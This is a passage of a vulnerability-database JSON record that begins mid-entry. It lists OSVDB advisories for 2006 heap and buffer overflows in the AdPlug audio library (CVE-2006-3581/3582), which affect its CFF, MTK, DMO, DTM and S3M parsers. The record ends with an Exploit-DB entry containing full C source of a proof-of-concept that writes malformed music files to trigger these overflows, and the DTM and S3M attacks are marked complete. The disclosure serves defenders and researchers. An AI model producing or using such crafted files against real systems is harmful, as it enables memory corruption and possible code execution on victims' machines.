http://www.gentoo.org/security/en/glsa/glsa-200609-06.xml\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0108.html\n[CVE-2006-3582](https://vulners.com/cve/CVE-2006-3582)\n", "modified": "2006-07-06T07:48:59", "published": "2006-07-06T07:48:59", "href": "https://vulners.com/osvdb/OSVDB:27043", "id": "OSVDB:27043", "title": "AdPlug mtk.cpp MTK File Unpacking Overflow", "type": "osvdb", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:23", "bulletinFamily": "software", "cvelist": ["CVE-2006-3582"], "edition": 1, "description": "## Vulnerability Description\nA local overflow exists in AdPlug . AdPlug fails to handle specialy crafted DMO files when unpacking them resulting in an heap overflow. A length value read directly in the header of the DMO file is not properly checked or sanitized when being used to allocate a buffer. A heap overflow could occur while unpacking the file allowing for the execution of arbitrary code.\n## Solution Description\nUpgrade to version CVS 05 Jul 2006 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nA local overflow exists in AdPlug . AdPlug fails to handle specialy crafted DMO files when unpacking them resulting in an heap overflow. A length value read directly in the header of the DMO file is not properly checked or sanitized when being used to allocate a buffer. A heap overflow could occur while unpacking the file allowing for the execution of arbitrary code.\n## References:\nVendor URL: http://adplug.sourceforge.net/\n[Vendor Specific Advisory URL](http://www.gentoo.org/security/en/glsa/glsa-200607-13.xml)\n[Secunia Advisory ID:21869](https://secuniaresearch.flexerasoftware.com/advisories/21869/)\n[Secunia Advisory ID:21295](https://secuniaresearch.flexerasoftware.com/advisories/21295/)\n[Secunia Advisory ID:20972](https://secuniaresearch.flexerasoftware.com/advisories/20972/)\n[Secunia Advisory ID:21238](https://secuniaresearch.flexerasoftware.com/advisories/21238/)\n[Related OSVDB ID: 27042](https://vulners.com/osvdb/OSVDB:27042)\n[Related OSVDB ID: 27047](https://vulners.com/osvdb/OSVDB:27047)\n[Related OSVDB ID: 27046](https://vulners.com/osvdb/OSVDB:27046)\n[Related OSVDB ID: 27043](https://vulners.com/osvdb/OSVDB:27043)\n[Related OSVDB ID: 27045](https://vulners.com/osvdb/OSVDB:27045)\nOther Advisory URL: http://aluigi.altervista.org/adv/adplugbof-adv.txt\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200609-06.xml\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0108.html\n[CVE-2006-3582](https://vulners.com/cve/CVE-2006-3582)\n", "modified": "2006-07-06T07:48:59", "published": "2006-07-06T07:48:59", "href": "https://vulners.com/osvdb/OSVDB:27044", "id": "OSVDB:27044", "title": "AdPlug dmo.cpp DMO File Unpacking Overflow", "type": "osvdb", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:23", "bulletinFamily": "software", "cvelist": ["CVE-2006-3581"], "edition": 1, "description": "## Vulnerability Description\nA local overflow exists in AdPlug. The 'dtm.cpp' library fails to sanitize user controlled fields in a DTM file resulting in a buffer overflow. With a specially crafted DTM file, an attacker can compromise applications using the library resulting in a loss of integrity.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nA local overflow exists in AdPlug. The 'dtm.cpp' library fails to sanitize user controlled fields in a DTM file resulting in a buffer overflow. With a specially crafted DTM file, an attacker can compromise applications using the library resulting in a loss of integrity.\n## References:\nVendor URL: http://adplug.sourceforge.net/\n[Vendor Specific Advisory URL](http://www.gentoo.org/security/en/glsa/glsa-200607-13.xml)\n[Secunia Advisory ID:21869](https://secuniaresearch.flexerasoftware.com/advisories/21869/)\n[Secunia Advisory ID:21295](https://secuniaresearch.flexerasoftware.com/advisories/21295/)\n[Secunia Advisory ID:20972](https://secuniaresearch.flexerasoftware.com/advisories/20972/)\n[Secunia Advisory ID:21238](https://secuniaresearch.flexerasoftware.com/advisories/21238/)\n[Related OSVDB ID: 27042](https://vulners.com/osvdb/OSVDB:27042)\n[Related OSVDB ID: 27047](https://vulners.com/osvdb/OSVDB:27047)\n[Related OSVDB ID: 27046](https://vulners.com/osvdb/OSVDB:27046)\n[Related OSVDB ID: 27044](https://vulners.com/osvdb/OSVDB:27044)\n[Related OSVDB ID: 27043](https://vulners.com/osvdb/OSVDB:27043)\nOther Advisory URL: http://aluigi.altervista.org/adv/adplugbof-adv.txt\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200609-06.xml\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0108.html\n[CVE-2006-3581](https://vulners.com/cve/CVE-2006-3581)\n", "modified": "2006-07-06T07:48:59", "published": "2006-07-06T07:48:59", "href": "https://vulners.com/osvdb/OSVDB:27045", "id": "OSVDB:27045", "title": "AdPlug dtm.cpp DTM File Processing Overflow", "type": "osvdb", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:23", "bulletinFamily": "software", "cvelist": ["CVE-2006-3581"], "edition": 1, "description": "## Vulnerability Description\nA local overflow exists in AdPlug . AdPlug fails to handle specialy crafted S3M files when unpacking them resulting in an heap overflow. A length value read directly in the header of the S3M file is not properly checked or sanitized when being used to allocate a buffer. A heap overflow could occur while unpacking the file allowing for the execution of arbitrary code.\n## Solution Description\nUpgrade to version CVS 05 Jul 2006 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nA local overflow exists in AdPlug . AdPlug fails to handle specialy crafted S3M files when unpacking them resulting in an heap overflow. A length value read directly in the header of the S3M file is not properly checked or sanitized when being used to allocate a buffer. A heap overflow could occur while unpacking the file allowing for the execution of arbitrary code.\n## References:\nVendor URL: http://adplug.sourceforge.net/\n[Vendor Specific Advisory URL](http://www.gentoo.org/security/en/glsa/glsa-200607-13.xml)\n[Secunia Advisory ID:21869](https://secuniaresearch.flexerasoftware.com/advisories/21869/)\n[Secunia Advisory ID:21295](https://secuniaresearch.flexerasoftware.com/advisories/21295/)\n[Secunia Advisory ID:20972](https://secuniaresearch.flexerasoftware.com/advisories/20972/)\n[Secunia Advisory ID:21238](https://secuniaresearch.flexerasoftware.com/advisories/21238/)\n[Related OSVDB ID: 27042](https://vulners.com/osvdb/OSVDB:27042)\n[Related OSVDB ID: 27047](https://vulners.com/osvdb/OSVDB:27047)\n[Related OSVDB ID: 27044](https://vulners.com/osvdb/OSVDB:27044)\n[Related OSVDB ID: 27043](https://vulners.com/osvdb/OSVDB:27043)\n[Related OSVDB ID: 27045](https://vulners.com/osvdb/OSVDB:27045)\nOther Advisory URL: http://aluigi.altervista.org/adv/adplugbof-adv.txt\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200609-06.xml\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0108.html\n[CVE-2006-3581](https://vulners.com/cve/CVE-2006-3581)\n", "modified": "2006-07-06T07:48:59", "published": "2006-07-06T07:48:59", "href": "https://vulners.com/osvdb/OSVDB:27046", "id": "OSVDB:27046", "title": "AdPlug s3m.cpp S3M File Processing Overflow", "type": "osvdb", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-03T07:35:40", "description": "AdPlug 2.0 Multiple Remote File Buffer Overflow Vulnerabilities. CVE-2006-3581. Remote exploit for linux platform", "published": "2006-07-06T00:00:00", "type": "exploitdb", "title": "AdPlug 2.0 - Multiple Remote File Buffer Overflow Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3581"], "modified": "2006-07-06T00:00:00", "id": "EDB-ID:28181", "href": "https://www.exploit-db.com/exploits/28181/", "sourceData": "source: http://www.securityfocus.com/bid/18859/info\r\n\r\nThe AdPlug library is affected by multiple remote buffer-overflow vulnerabilities. These issues are due to the library's failure to properly bounds-check user-supplied input before copying it into insufficiently sized memory buffers.\r\n\r\nThese issues allow remote attackers to execute arbitrary machine code in the context of the user running applications that use the affected library to open attacker-supplied malicious files.\r\n\r\nThe AdPlug library version 2.0 is vulnerable to these issues; previous versions may also be affected.\r\n\r\n/*\r\n\r\nby Luigi Auriemma\r\n\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n\r\n\r\n\r\n#define VER \"0.1\"\r\n#define MODULESIZE 0x10000\r\n\r\n#define LOWORD(l) ((l) & 0xffff)\r\n#define HIWORD(l) ((l) >> 16)\r\n#define LOBYTE(w) ((w) & 0xff)\r\n#define HIBYTE(w) ((w) >> 8)\r\n#define ARRAY_AS_DWORD(a, i) ((a[i + 3] << 24) + (a[i + 2] << 16) + (a[i + 1] << 8) + a[i])\r\n#define ARRAY_AS_WORD(a, i) ((a[i + 1] << 8) + a[i])\r\n#define CHARP_AS_WORD(p) (((*(p + 1)) << 8) + (*p))\r\n\r\n\r\n\r\nunsigned short dmo_unpacker_brand(unsigned short range);\r\nint dmo_unpacker_decrypt(unsigned char *buf, long len);\r\nvoid std_err(void);\r\n\r\n\r\n\r\n#pragma pack(1)\r\n\r\nstruct {\r\n char id[16];\r\n unsigned char version;\r\n unsigned short size;\r\n unsigned char packed;\r\n unsigned char reserved[12];\r\n} cff_head;\r\n\r\nstruct {\r\n char id[18];\r\n unsigned short crc;\r\n unsigned short size;\r\n} mtk_head;\r\n\r\nstruct {\r\n char id[12];\r\n unsigned char version;\r\n char title[20];\r\n char author[20];\r\n unsigned char numpat;\r\n unsigned char numinst;\r\n} dtm_head;\r\n\r\nstruct {\r\n char name[28];\r\n unsigned char kennung;\r\n unsigned char typ;\r\n unsigned char dummy[2];\r\n unsigned short ordnum;\r\n unsigned short insnum;\r\n unsigned short patnum;\r\n unsigned short flags;\r\n unsigned short cwtv;\r\n unsigned short ffi;\r\n char scrm[4];\r\n unsigned char gv;\r\n unsigned char is;\r\n unsigned char it;\r\n unsigned char mv;\r\n unsigned char uc;\r\n unsigned char dp;\r\n unsigned char dummy2[8];\r\n unsigned short special;\r\n unsigned char chanset[32];\r\n} s3m_head;\r\n\r\n#pragma pack()\r\n\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n FILE *fd;\r\n int i,\r\n j,\r\n attack,\r\n buffsz,\r\n compsz;\r\n unsigned char *buff,\r\n *comp;\r\n\r\n fputs(\"\\n\"\r\n \"AdPlug library <= 2.0 and CVS <= 04 Jul 2006 multiple overflow \"VER\"\\n\"\r\n \"by Luigi Auriemma\\n\"\r\n \"e-mail: aluigi@autistici.org\\n\"\r\n \"web: aluigi.org\\n\"\r\n \"\\n\", stdout);\r\n\r\n if(argc < 2) {\r\n printf(\"\\n\"\r\n \"Usage: %s <attack> <file_to_create>\\n\"\r\n \"\\n\"\r\n \"Attack:\\n\"\r\n \" 1 = heap overflow in the unpacking of CFF files\\n\"\r\n \" 2 = heap overflow in the unpacking of MTK files\\n\"\r\n \" 3 = heap overflow in the unpacking of DMO files\\n\"\r\n \" 4 = buffer-overflow in DTM files\\n\"\r\n \" 5 = buffer-overflow in S3M files\\n\"\r\n \" 6 = heap overflow in the unpacking of U6M files\\n\"\r\n \"\\n\"\r\n \"Note: this proof-of-concept is experimental and doesn't contain the code for\\n\"\r\n \" compressing the data so you must edit it for adding the missing code if\\n\"\r\n \" you have it\\n\"\r\n \" Actually only attack 4 and 5 can be considered completed!\\n\"\r\n \"\\n\", argv[0]);\r\n exit(1);\r\n }\r\n\r\n attack = atoi(argv[1]);\r\n\r\n printf(\"- create file %s\\n\", argv[2]);\r\n fd = fopen(argv[2], \"rb\");\r\n if(fd) {\r\n fclose(fd);\r\n printf(\"- do you want to overwrite it (y/N)?\\n \");\r\n fflush(stdin);\r\n if((fgetc(stdin) | 0x20) != 'y') exit(1);\r\n }\r\n fd = fopen(argv[2], \"wb\");\r\n if(!fd) std_err();\r\n\r\n if(attack == 1) { /* CFF */\r\n buffsz = MODULESIZE + 256;\r\n\r\n buff = malloc(buffsz);\r\n\r\n memset(buff, 0, MODULESIZE);\r\n memcpy(&buff[0x5E1], \"CUD-FM-File - SEND A POSTCARD -\", 31); // for quick return\r\n memset(buff + MODULESIZE, 'a', buffsz - MODULESIZE);\r\n\r\n /*\r\n DATA MUST BE COMPRESSED WITH A PARTICULAR TYPE OF LZW!!!\r\n I DON'T KNOW THE COMPRESSION ALGORITHM SO DATA IS STORED AS IS\r\n */\r\n // compsz = 16 + compress(buff, comp + 16, buffsz);\r\n comp = buff;\r\n compsz = buffsz;\r\n\r\n memcpy(comp, \"YsComp\"\"\\x07\"\"CUD1997\"\"\\x1A\\x04\", 16);\r\n\r\n memcpy(cff_head.id, \"<CUD-FM-File>\"\"\\x1A\\xDE\\xE0\", sizeof(cff_head.id));\r\n cff_head.version = 1;\r\n cff_head.size = compsz;\r\n cff_head.packed = 1;\r\n memset(cff_head.reserved, 0, sizeof(cff_head.reserved));\r\n\r\n fwrite(&cff_head, sizeof(cff_head), 1, fd);\r\n fwrite(comp, compsz, 1, fd);\r\n\r\n } else if(attack == 2) { /* MTK */\r\n buffsz = 0xffff;\r\n\r\n buff = malloc(buffsz);\r\n\r\n memset(buff, 'a', buffsz);\r\n\r\n /*\r\n DATA MUST BE COMPRESSED!!!\r\n I DON'T KNOW THE COMPRESSION ALGORITHM SO DATA IS STORED AS IS\r\n */\r\n // compsz = compress(buff, comp, buffsz);\r\n comp = buff;\r\n compsz = buffsz;\r\n\r\n strncpy(mtk_head.id, \"mpu401tr\\x92kk\\xeer@data\", 18);\r\n mtk_head.crc = 0;\r\n mtk_head.size = 0; // heap overflow\r\n\r\n fwrite(&mtk_head, sizeof(mtk_head), 1, fd);\r\n fwrite(comp, compsz, 1, fd);\r\n\r\n } else if(attack == 3) { /* DMO */\r\n printf(\"- not implemented!\\n\");\r\n\r\n } else if(attack == 4) { /* DTM */\r\n strncpy(dtm_head.id, \"DeFy DTM \", sizeof(dtm_head.id));\r\n dtm_head.version = 0x10;\r\n strncpy(dtm_head.title, \"title\", sizeof(dtm_head.title));\r\n strncpy(dtm_head.author,\"author\", sizeof(dtm_head.author));\r\n dtm_head.numpat = 0;\r\n dtm_head.numinst = 0;\r\n\r\n fwrite(&dtm_head, sizeof(dtm_head), 1, fd);\r\n\r\n for(i = 0; i < 15; i++) fputc(0, fd);\r\n buffsz = 140; // <== buffer-overflow\r\n buff = malloc(buffsz);\r\n memset(buff, 'a', buffsz);\r\n fputc(buffsz, fd);\r\n fwrite(buff, buffsz, 1, fd);\r\n\r\n for(i = 0; i < 100; i++) fputc(0, fd);\r\n\r\n } else if(attack == 5) { /* S3M */\r\n strncpy(s3m_head.name, \"name\", sizeof(s3m_head.name));\r\n s3m_head.kennung = 0x1a;\r\n s3m_head.typ = 16;\r\n memset(s3m_head.dummy, 0, sizeof(s3m_head.dummy));\r\n s3m_head.ordnum = 0;\r\n s3m_head.insnum = 120; // <== buffer-overflow\r\n s3m_head.patnum = 0; // <== buffer-overflow\r\n s3m_head.flags = 0;\r\n s3m_head.cwtv = 0;\r\n s3m_head.ffi = 0;\r\n memcpy(s3m_head.scrm, \"SCRM\", sizeof(s3m_head.scrm));\r\n s3m_head.gv = 0;\r\n s3m_head.is = 0;\r\n s3m_head.it = 0;\r\n s3m_head.mv = 0;\r\n s3m_head.uc = 0;\r\n s3m_head.dp = 0;\r\n memset(s3m_head.dummy2, 0, sizeof(s3m_head.dummy2));\r\n s3m_head.special = 0;\r\n for(i = 0; i < 32; i++) s3m_head.chanset[i] = 0;\r\n\r\n fwrite(&s3m_head, sizeof(s3m_head), 1, fd);\r\n for(i = 0; i < s3m_head.ordnum; i++) fputc('a', fd);\r\n for(i = 0; i < s3m_head.insnum; i++) { fputc('1', fd); fputc('0', fd); } // little endian\r\n for(i = 0; i < s3m_head.patnum; i++) { fputc('1', fd); fputc('0', fd); } // little endian\r\n\r\n for(i = 0; i < s3m_head.insnum; i++) {\r\n for(j = 0; j < 80; j++) fputc(0, fd);\r\n }\r\n\r\n for(i = 0; i < s3m_head.patnum; i++) {\r\n /* skipped */\r\n }\r\n\r\n } else if(attack == 6) { /* U6M */\r\n buffsz = 1000;\r\n buff = malloc(buffsz);\r\n\r\n memset(buff, 0, buffsz);\r\n /*\r\n DATA MUST BE COMPRESSED WITH A PARTICULAR TYPE OF LZW!!!\r\n I DON'T KNOW THE COMPRESSION ALGORITHM SO DATA IS STORED AS IS\r\n */\r\n // compsz = compress(buff, comp, buffsz);\r\n comp = buff;\r\n compsz = buffsz;\r\n\r\n fputc(buffsz & 0xff, fd);\r\n fputc((buffsz >> 8) & 0xff, fd);\r\n fputc(0, fd);\r\n fputc(0, fd);\r\n fputc(0, fd);\r\n fputc(1, fd);\r\n\r\n fwrite(comp, compsz, 1, fd);\r\n }\r\n\r\n fclose(fd);\r\n printf(\"- finished\\n\");\r\n return(0);\r\n}\r\n\r\n\r\n\r\nvoid std_err(void) {\r\n perror(\"\\nError\");\r\n exit(1);\r\n}", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/28181/"}]}